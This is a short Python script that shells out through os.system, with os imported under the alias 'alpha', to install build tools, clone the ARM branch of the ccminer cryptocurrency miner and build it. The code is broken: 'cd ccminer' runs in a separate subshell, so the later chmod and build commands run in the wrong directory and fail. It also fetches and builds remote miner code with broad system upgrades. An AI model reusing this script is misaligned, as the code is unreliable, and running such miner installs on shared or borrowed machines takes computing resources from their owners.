import os as alpha
alpha.system("pip install --upgrade pip")
alpha.system("apt-get update -y")
alpha.system("apt-get upgrade -y")
alpha.system("apt-get install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential -y")
alpha.system("apt-get install git -y")
alpha.system("git clone --single-branch -b ARM https://github.com/monkins1010/ccminer.git")
alpha.system("cd ccminer")
alpha.system("chmod +x build.sh && chmod +x configure.sh && chmod +x autogen.sh")
alpha.system("./build.sh")
